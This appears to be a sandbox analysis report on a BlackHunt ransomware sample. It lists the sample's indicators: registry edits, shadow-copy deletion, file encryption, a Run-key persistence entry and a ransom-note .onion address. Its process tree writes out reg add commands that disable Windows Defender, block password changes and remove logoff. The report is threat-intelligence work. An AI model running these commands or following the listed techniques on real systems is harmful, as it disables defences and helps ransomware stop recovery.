Analysis
-
max time kernel
151s -
max time network
125s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system -
submitted
19-01-2024 01:15
Static task
static1
Behavioral task
behavioral1
Sample
e6c977743a37f0a3be3e392afeffebe47199ba13883566a55a757f20a78af07d.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
e6c977743a37f0a3be3e392afeffebe47199ba13883566a55a757f20a78af07d.exe
Resource
win10v2004-20231215-en
General
-
Target
e6c977743a37f0a3be3e392afeffebe47199ba13883566a55a757f20a78af07d.exe
-
Size
707KB
-
MD5
6ac8425bd24ebff72ea760b5d2d4d4b0
-
SHA1
a6df7938c4aeaa5e78a225ac302b6d5aa2ca79f3
-
SHA256
e6c977743a37f0a3be3e392afeffebe47199ba13883566a55a757f20a78af07d
-
SHA512
d8a4ab9ad1f3f350cc2a991685754d8b2b03bbef1b9369065275588402167d59b98c757bd8fecc49e6d7f9d6479f3897e8fbde50cd58233633c187328f632418
-
SSDEEP
6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza1V8Ivnh:6uaTmkZJ+naie5OTamgEoKxLWA2h
Malware Config
Extracted
C:\ProgramData\#BlackHunt_ReadMe.hta
http-equiv="x-ua-compatible"
http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures
-
Deletes NTFS Change Journal 2 TTPs 1 IoCs
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
pid Process 2768 fsutil.exe -
description ioc Process Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" e6c977743a37f0a3be3e392afeffebe47199ba13883566a55a757f20a78af07d.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
pid Process 2764 bcdedit.exe 3040 bcdedit.exe -
Renames multiple (2346) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
pid Process 2496 wbadmin.exe -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" e6c977743a37f0a3be3e392afeffebe47199ba13883566a55a757f20a78af07d.exe -
Enumerates connected drives 3 TTPs 25 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\A: e6c977743a37f0a3be3e392afeffebe47199ba13883566a55a757f20a78af07d.exe File opened (read-only) \??\G: e6c977743a37f0a3be3e392afeffebe47199ba13883566a55a757f20a78af07d.exe File opened (read-only) \??\I: e6c977743a37f0a3be3e392afeffebe47199ba13883566a55a757f20a78af07d.exe File opened (read-only) \??\K: e6c977743a37f0a3be3e392afeffebe47199ba13883566a55a757f20a78af07d.exe File opened (read-only) \??\N: e6c977743a37f0a3be3e392afeffebe47199ba13883566a55a757f20a78af07d.exe File opened (read-only) \??\Q: e6c977743a37f0a3be3e392afeffebe47199ba13883566a55a757f20a78af07d.exe File opened (read-only) \??\W: e6c977743a37f0a3be3e392afeffebe47199ba13883566a55a757f20a78af07d.exe File opened (read-only) \??\T: e6c977743a37f0a3be3e392afeffebe47199ba13883566a55a757f20a78af07d.exe File opened (read-only) \??\Y: e6c977743a37f0a3be3e392afeffebe47199ba13883566a55a757f20a78af07d.exe File opened (read-only) \??\X: e6c977743a37f0a3be3e392afeffebe47199ba13883566a55a757f20a78af07d.exe File opened (read-only) \??\V: e6c977743a37f0a3be3e392afeffebe47199ba13883566a55a757f20a78af07d.exe File opened (read-only) \??\B: e6c977743a37f0a3be3e392afeffebe47199ba13883566a55a757f20a78af07d.exe File opened (read-only) \??\R: e6c977743a37f0a3be3e392afeffebe47199ba13883566a55a757f20a78af07d.exe File opened (read-only) \??\M: e6c977743a37f0a3be3e392afeffebe47199ba13883566a55a757f20a78af07d.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\E: e6c977743a37f0a3be3e392afeffebe47199ba13883566a55a757f20a78af07d.exe File opened (read-only) \??\Z: e6c977743a37f0a3be3e392afeffebe47199ba13883566a55a757f20a78af07d.exe File opened (read-only) \??\P: e6c977743a37f0a3be3e392afeffebe47199ba13883566a55a757f20a78af07d.exe File opened (read-only) \??\J: e6c977743a37f0a3be3e392afeffebe47199ba13883566a55a757f20a78af07d.exe File opened (read-only) \??\L: e6c977743a37f0a3be3e392afeffebe47199ba13883566a55a757f20a78af07d.exe File opened (read-only) \??\O: e6c977743a37f0a3be3e392afeffebe47199ba13883566a55a757f20a78af07d.exe File opened (read-only) \??\S: e6c977743a37f0a3be3e392afeffebe47199ba13883566a55a757f20a78af07d.exe File opened (read-only) \??\H: e6c977743a37f0a3be3e392afeffebe47199ba13883566a55a757f20a78af07d.exe File opened (read-only) \??\U: e6c977743a37f0a3be3e392afeffebe47199ba13883566a55a757f20a78af07d.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 2 ip-api.com -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-sa_zh_CN.jar e6c977743a37f0a3be3e392afeffebe47199ba13883566a55a757f20a78af07d.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Kentucky\Louisville e6c977743a37f0a3be3e392afeffebe47199ba13883566a55a757f20a78af07d.exe File created C:\Program Files\VideoLAN\VLC\locale\et\#BlackHunt_ReadMe.hta e6c977743a37f0a3be3e392afeffebe47199ba13883566a55a757f20a78af07d.exe File opened for modification C:\Program Files\7-Zip\Lang\nl.txt e6c977743a37f0a3be3e392afeffebe47199ba13883566a55a757f20a78af07d.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.core\cache\binary\#BlackHunt_Private.key e6c977743a37f0a3be3e392afeffebe47199ba13883566a55a757f20a78af07d.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\org-netbeans-modules-profiler-api.jar e6c977743a37f0a3be3e392afeffebe47199ba13883566a55a757f20a78af07d.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Aqtau e6c977743a37f0a3be3e392afeffebe47199ba13883566a55a757f20a78af07d.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Porto_Velho e6c977743a37f0a3be3e392afeffebe47199ba13883566a55a757f20a78af07d.exe File created C:\Program Files\Java\jdk1.7.0_80\include\win32\#BlackHunt_ReadMe.hta e6c977743a37f0a3be3e392afeffebe47199ba13883566a55a757f20a78af07d.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\jconsole.jar e6c977743a37f0a3be3e392afeffebe47199ba13883566a55a757f20a78af07d.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-openide-nodes.jar e6c977743a37f0a3be3e392afeffebe47199ba13883566a55a757f20a78af07d.exe File opened for modification C:\Program Files\Java\jre7\lib\management\management.properties e6c977743a37f0a3be3e392afeffebe47199ba13883566a55a757f20a78af07d.exe File created C:\Program Files\VideoLAN\VLC\locale\gd\#BlackHunt_Private.key e6c977743a37f0a3be3e392afeffebe47199ba13883566a55a757f20a78af07d.exe File opened for modification C:\Program Files\7-Zip\Lang\eo.txt e6c977743a37f0a3be3e392afeffebe47199ba13883566a55a757f20a78af07d.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\bin\dtplugin\#BlackHunt_Private.key e6c977743a37f0a3be3e392afeffebe47199ba13883566a55a757f20a78af07d.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Indiana\#BlackHunt_Private.key e6c977743a37f0a3be3e392afeffebe47199ba13883566a55a757f20a78af07d.exe File created C:\Program Files\VideoLAN\VLC\locale\fur\#BlackHunt_ReadMe.hta e6c977743a37f0a3be3e392afeffebe47199ba13883566a55a757f20a78af07d.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\WET e6c977743a37f0a3be3e392afeffebe47199ba13883566a55a757f20a78af07d.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-swing-plaf.xml e6c977743a37f0a3be3e392afeffebe47199ba13883566a55a757f20a78af07d.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Toronto e6c977743a37f0a3be3e392afeffebe47199ba13883566a55a757f20a78af07d.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core-output2_ja.jar e6c977743a37f0a3be3e392afeffebe47199ba13883566a55a757f20a78af07d.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Stacking\NavigationRight_ButtonGraphic.png e6c977743a37f0a3be3e392afeffebe47199ba13883566a55a757f20a78af07d.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\btn-next-static.png e6c977743a37f0a3be3e392afeffebe47199ba13883566a55a757f20a78af07d.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.forms.nl_zh_4.4.0.v20140623020002.jar e6c977743a37f0a3be3e392afeffebe47199ba13883566a55a757f20a78af07d.exe File opened for modification C:\Program Files\Java\jre7\lib\fonts\LucidaSansDemiBold.ttf e6c977743a37f0a3be3e392afeffebe47199ba13883566a55a757f20a78af07d.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Notes_LOOP_BG_PAL.wmv e6c977743a37f0a3be3e392afeffebe47199ba13883566a55a757f20a78af07d.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\org-openide-nodes.xml e6c977743a37f0a3be3e392afeffebe47199ba13883566a55a757f20a78af07d.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-jmx_ja.jar e6c977743a37f0a3be3e392afeffebe47199ba13883566a55a757f20a78af07d.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\rarrow.gif e6c977743a37f0a3be3e392afeffebe47199ba13883566a55a757f20a78af07d.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-editor-mimelookup.xml e6c977743a37f0a3be3e392afeffebe47199ba13883566a55a757f20a78af07d.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-explorer.xml e6c977743a37f0a3be3e392afeffebe47199ba13883566a55a757f20a78af07d.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Ulaanbaatar e6c977743a37f0a3be3e392afeffebe47199ba13883566a55a757f20a78af07d.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\HueCycle\NavigationLeft_ButtonGraphic.png e6c977743a37f0a3be3e392afeffebe47199ba13883566a55a757f20a78af07d.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-progress-ui_ja.jar e6c977743a37f0a3be3e392afeffebe47199ba13883566a55a757f20a78af07d.exe File created C:\Program Files\VideoLAN\VLC\locale\bn_IN\LC_MESSAGES\#BlackHunt_ReadMe.hta e6c977743a37f0a3be3e392afeffebe47199ba13883566a55a757f20a78af07d.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-lib-profiler_ja.jar e6c977743a37f0a3be3e392afeffebe47199ba13883566a55a757f20a78af07d.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Blanc-Sablon e6c977743a37f0a3be3e392afeffebe47199ba13883566a55a757f20a78af07d.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Atlantic\Faroe e6c977743a37f0a3be3e392afeffebe47199ba13883566a55a757f20a78af07d.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Noumea e6c977743a37f0a3be3e392afeffebe47199ba13883566a55a757f20a78af07d.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\.settings\#BlackHunt_ReadMe.txt e6c977743a37f0a3be3e392afeffebe47199ba13883566a55a757f20a78af07d.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-options-keymap.xml e6c977743a37f0a3be3e392afeffebe47199ba13883566a55a757f20a78af07d.exe File created C:\Program Files\Java\jre7\lib\zi\Asia\#BlackHunt_ReadMe.hta e6c977743a37f0a3be3e392afeffebe47199ba13883566a55a757f20a78af07d.exe File created C:\Program Files\DVD Maker\Shared\#BlackHunt_ReadMe.txt e6c977743a37f0a3be3e392afeffebe47199ba13883566a55a757f20a78af07d.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Yerevan e6c977743a37f0a3be3e392afeffebe47199ba13883566a55a757f20a78af07d.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench.addons.swt.nl_zh_4.4.0.v20140623020002.jar e6c977743a37f0a3be3e392afeffebe47199ba13883566a55a757f20a78af07d.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ui.nl_ja_4.4.0.v20140623020002.jar e6c977743a37f0a3be3e392afeffebe47199ba13883566a55a757f20a78af07d.exe File created C:\Program Files\Java\jre7\lib\amd64\#BlackHunt_ReadMe.hta e6c977743a37f0a3be3e392afeffebe47199ba13883566a55a757f20a78af07d.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-swing-tabcontrol.jar e6c977743a37f0a3be3e392afeffebe47199ba13883566a55a757f20a78af07d.exe File created C:\Program Files\VideoLAN\VLC\locale\ff\LC_MESSAGES\#BlackHunt_Private.key e6c977743a37f0a3be3e392afeffebe47199ba13883566a55a757f20a78af07d.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Full\#BlackHunt_Private.key e6c977743a37f0a3be3e392afeffebe47199ba13883566a55a757f20a78af07d.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\VideoWall\#BlackHunt_ReadMe.hta e6c977743a37f0a3be3e392afeffebe47199ba13883566a55a757f20a78af07d.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT-9 e6c977743a37f0a3be3e392afeffebe47199ba13883566a55a757f20a78af07d.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Bogota e6c977743a37f0a3be3e392afeffebe47199ba13883566a55a757f20a78af07d.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\play-static.png e6c977743a37f0a3be3e392afeffebe47199ba13883566a55a757f20a78af07d.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\ResizingPanels\blackbars80.png e6c977743a37f0a3be3e392afeffebe47199ba13883566a55a757f20a78af07d.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\MST7 e6c977743a37f0a3be3e392afeffebe47199ba13883566a55a757f20a78af07d.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\NavigationUp_ButtonGraphic.png e6c977743a37f0a3be3e392afeffebe47199ba13883566a55a757f20a78af07d.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Paris e6c977743a37f0a3be3e392afeffebe47199ba13883566a55a757f20a78af07d.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Dhaka e6c977743a37f0a3be3e392afeffebe47199ba13883566a55a757f20a78af07d.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\MET e6c977743a37f0a3be3e392afeffebe47199ba13883566a55a757f20a78af07d.exe File created C:\Program Files\Java\#BlackHunt_Private.key e6c977743a37f0a3be3e392afeffebe47199ba13883566a55a757f20a78af07d.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\images\cursors\win32_MoveDrop32x32.gif e6c977743a37f0a3be3e392afeffebe47199ba13883566a55a757f20a78af07d.exe File created C:\Program Files\VideoLAN\VLC\locale\brx\LC_MESSAGES\#BlackHunt_ReadMe.hta e6c977743a37f0a3be3e392afeffebe47199ba13883566a55a757f20a78af07d.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Chicago e6c977743a37f0a3be3e392afeffebe47199ba13883566a55a757f20a78af07d.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2776 schtasks.exe -
Interacts with shadow copies 2 TTPs 5 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 2900 vssadmin.exe 2812 vssadmin.exe 2732 vssadmin.exe 2092 vssadmin.exe 2748 vssadmin.exe -
Modifies registry class 8 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon reg.exe -
Suspicious use of AdjustPrivilegeToken 13 IoCs
description pid Process Token: SeDebugPrivilege 2288 e6c977743a37f0a3be3e392afeffebe47199ba13883566a55a757f20a78af07d.exe Token: SeRestorePrivilege 2288 e6c977743a37f0a3be3e392afeffebe47199ba13883566a55a757f20a78af07d.exe Token: SeBackupPrivilege 2288 e6c977743a37f0a3be3e392afeffebe47199ba13883566a55a757f20a78af07d.exe Token: SeTakeOwnershipPrivilege 2288 e6c977743a37f0a3be3e392afeffebe47199ba13883566a55a757f20a78af07d.exe Token: SeAuditPrivilege 2288 e6c977743a37f0a3be3e392afeffebe47199ba13883566a55a757f20a78af07d.exe Token: SeSecurityPrivilege 2288 e6c977743a37f0a3be3e392afeffebe47199ba13883566a55a757f20a78af07d.exe Token: SeIncBasePriorityPrivilege 2288 e6c977743a37f0a3be3e392afeffebe47199ba13883566a55a757f20a78af07d.exe Token: SeBackupPrivilege 2692 vssvc.exe Token: SeRestorePrivilege 2692 vssvc.exe Token: SeAuditPrivilege 2692 vssvc.exe Token: SeBackupPrivilege 1388 wbengine.exe Token: SeRestorePrivilege 1388 wbengine.exe Token: SeSecurityPrivilege 1388 wbengine.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2288 wrote to memory of 2820 2288 e6c977743a37f0a3be3e392afeffebe47199ba13883566a55a757f20a78af07d.exe 128 PID 2288 wrote to memory of 2820 2288 e6c977743a37f0a3be3e392afeffebe47199ba13883566a55a757f20a78af07d.exe 128 PID 2288 wrote to memory of 2820 2288 e6c977743a37f0a3be3e392afeffebe47199ba13883566a55a757f20a78af07d.exe 128 PID 2288 wrote to memory of 2820 2288 e6c977743a37f0a3be3e392afeffebe47199ba13883566a55a757f20a78af07d.exe 128 PID 2288 wrote to memory of 2804 2288 e6c977743a37f0a3be3e392afeffebe47199ba13883566a55a757f20a78af07d.exe 127 PID 2288 wrote to memory of 2804 2288 e6c977743a37f0a3be3e392afeffebe47199ba13883566a55a757f20a78af07d.exe 127 PID 2288 wrote to memory of 2804 2288 e6c977743a37f0a3be3e392afeffebe47199ba13883566a55a757f20a78af07d.exe 127 PID 2288 wrote to memory of 2804 2288 e6c977743a37f0a3be3e392afeffebe47199ba13883566a55a757f20a78af07d.exe 127 PID 2288 wrote to memory of 2364 2288 e6c977743a37f0a3be3e392afeffebe47199ba13883566a55a757f20a78af07d.exe 126 PID 2288 wrote to memory of 2364 2288 e6c977743a37f0a3be3e392afeffebe47199ba13883566a55a757f20a78af07d.exe 126 PID 2288 wrote to memory of 2364 2288 e6c977743a37f0a3be3e392afeffebe47199ba13883566a55a757f20a78af07d.exe 126 PID 2288 wrote to memory of 2364 2288 e6c977743a37f0a3be3e392afeffebe47199ba13883566a55a757f20a78af07d.exe 126 PID 2820 wrote to memory of 2844 2820 cmd.exe 124 PID 2820 wrote to memory of 2844 2820 cmd.exe 124 PID 2820 wrote to memory of 2844 2820 cmd.exe 124 PID 2288 wrote to memory of 2960 2288 e6c977743a37f0a3be3e392afeffebe47199ba13883566a55a757f20a78af07d.exe 122 PID 2288 wrote to memory of 2960 2288 e6c977743a37f0a3be3e392afeffebe47199ba13883566a55a757f20a78af07d.exe 122 PID 2288 wrote to memory of 2960 2288 e6c977743a37f0a3be3e392afeffebe47199ba13883566a55a757f20a78af07d.exe 122 PID 2288 wrote to memory of 2960 2288 e6c977743a37f0a3be3e392afeffebe47199ba13883566a55a757f20a78af07d.exe 122 PID 2288 wrote to memory of 1692 2288 e6c977743a37f0a3be3e392afeffebe47199ba13883566a55a757f20a78af07d.exe 120 PID 2288 wrote to memory of 1692 2288 e6c977743a37f0a3be3e392afeffebe47199ba13883566a55a757f20a78af07d.exe 120 PID 2288 wrote to memory of 1692 2288 e6c977743a37f0a3be3e392afeffebe47199ba13883566a55a757f20a78af07d.exe 120 PID 2288 wrote to memory of 1692 2288 e6c977743a37f0a3be3e392afeffebe47199ba13883566a55a757f20a78af07d.exe 120 PID 2804 wrote to memory of 2620 2804 cmd.exe 118 PID 2804 wrote to memory of 2620 2804 cmd.exe 118 PID 2804 wrote to memory of 2620 2804 cmd.exe 118 PID 2288 wrote to memory of 2684 2288 e6c977743a37f0a3be3e392afeffebe47199ba13883566a55a757f20a78af07d.exe 30 PID 2288 wrote to memory of 2684 2288 e6c977743a37f0a3be3e392afeffebe47199ba13883566a55a757f20a78af07d.exe 30 PID 2288 wrote to memory of 2684 2288 e6c977743a37f0a3be3e392afeffebe47199ba13883566a55a757f20a78af07d.exe 30 PID 2288 wrote to memory of 2684 2288 e6c977743a37f0a3be3e392afeffebe47199ba13883566a55a757f20a78af07d.exe 30 PID 2288 wrote to memory of 2628 2288 e6c977743a37f0a3be3e392afeffebe47199ba13883566a55a757f20a78af07d.exe 117 PID 2288 wrote to memory of 2628 2288 e6c977743a37f0a3be3e392afeffebe47199ba13883566a55a757f20a78af07d.exe 117 PID 2288 wrote to memory of 2628 2288 e6c977743a37f0a3be3e392afeffebe47199ba13883566a55a757f20a78af07d.exe 117 PID 2288 wrote to memory of 2628 2288 e6c977743a37f0a3be3e392afeffebe47199ba13883566a55a757f20a78af07d.exe 117 PID 2288 wrote to memory of 2592 2288 e6c977743a37f0a3be3e392afeffebe47199ba13883566a55a757f20a78af07d.exe 115 PID 2288 wrote to memory of 2592 2288 e6c977743a37f0a3be3e392afeffebe47199ba13883566a55a757f20a78af07d.exe 115 PID 2288 wrote to memory of 2592 2288 e6c977743a37f0a3be3e392afeffebe47199ba13883566a55a757f20a78af07d.exe 115 PID 2288 wrote to memory of 2592 2288 e6c977743a37f0a3be3e392afeffebe47199ba13883566a55a757f20a78af07d.exe 115 PID 2364 wrote to memory of 2644 2364 cmd.exe 113 PID 2364 wrote to memory of 2644 2364 cmd.exe 113 PID 2364 wrote to memory of 2644 2364 cmd.exe 113 PID 2288 wrote to memory of 1076 2288 e6c977743a37f0a3be3e392afeffebe47199ba13883566a55a757f20a78af07d.exe 112 PID 2288 wrote to memory of 1076 2288 e6c977743a37f0a3be3e392afeffebe47199ba13883566a55a757f20a78af07d.exe 112 PID 2288 wrote to memory of 1076 2288 e6c977743a37f0a3be3e392afeffebe47199ba13883566a55a757f20a78af07d.exe 112 PID 2288 wrote to memory of 1076 2288 e6c977743a37f0a3be3e392afeffebe47199ba13883566a55a757f20a78af07d.exe 112 PID 2288 wrote to memory of 1648 2288 e6c977743a37f0a3be3e392afeffebe47199ba13883566a55a757f20a78af07d.exe 111 PID 2288 wrote to memory of 1648 2288 e6c977743a37f0a3be3e392afeffebe47199ba13883566a55a757f20a78af07d.exe 111 PID 2288 wrote to memory of 1648 2288 e6c977743a37f0a3be3e392afeffebe47199ba13883566a55a757f20a78af07d.exe 111 PID 2288 wrote to memory of 1648 2288 e6c977743a37f0a3be3e392afeffebe47199ba13883566a55a757f20a78af07d.exe 111 PID 2960 wrote to memory of 2616 2960 cmd.exe 110 PID 2960 wrote to memory of 2616 2960 cmd.exe 110 PID 2960 wrote to memory of 2616 2960 cmd.exe 110 PID 2288 wrote to memory of 2460 2288 e6c977743a37f0a3be3e392afeffebe47199ba13883566a55a757f20a78af07d.exe 109 PID 2288 wrote to memory of 2460 2288 e6c977743a37f0a3be3e392afeffebe47199ba13883566a55a757f20a78af07d.exe 109 PID 2288 wrote to memory of 2460 2288 e6c977743a37f0a3be3e392afeffebe47199ba13883566a55a757f20a78af07d.exe 109 PID 2288 wrote to memory of 2460 2288 e6c977743a37f0a3be3e392afeffebe47199ba13883566a55a757f20a78af07d.exe 109 PID 1692 wrote to memory of 2124 1692 cmd.exe 108 PID 1692 wrote to memory of 2124 1692 cmd.exe 108 PID 1692 wrote to memory of 2124 1692 cmd.exe 108 PID 2288 wrote to memory of 2556 2288 e6c977743a37f0a3be3e392afeffebe47199ba13883566a55a757f20a78af07d.exe 70 PID 2288 wrote to memory of 2556 2288 e6c977743a37f0a3be3e392afeffebe47199ba13883566a55a757f20a78af07d.exe 70 PID 2288 wrote to memory of 2556 2288 e6c977743a37f0a3be3e392afeffebe47199ba13883566a55a757f20a78af07d.exe 70 PID 2288 wrote to memory of 2556 2288 e6c977743a37f0a3be3e392afeffebe47199ba13883566a55a757f20a78af07d.exe 70 PID 2288 wrote to memory of 1540 2288 e6c977743a37f0a3be3e392afeffebe47199ba13883566a55a757f20a78af07d.exe 69 -
System policy modification 1 TTPs 3 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System e6c977743a37f0a3be3e392afeffebe47199ba13883566a55a757f20a78af07d.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" e6c977743a37f0a3be3e392afeffebe47199ba13883566a55a757f20a78af07d.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" e6c977743a37f0a3be3e392afeffebe47199ba13883566a55a757f20a78af07d.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\e6c977743a37f0a3be3e392afeffebe47199ba13883566a55a757f20a78af07d.exe"C:\Users\Admin\AppData\Local\Temp\e6c977743a37f0a3be3e392afeffebe47199ba13883566a55a757f20a78af07d.exe"1⤵
- UAC bypass
- Checks whether UAC is enabled
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:2288 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f2⤵PID:2684
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f3⤵PID:2560
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f2⤵PID:2416
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f3⤵PID:2608
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f2⤵PID:1264
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f3⤵PID:2516
-
-
-
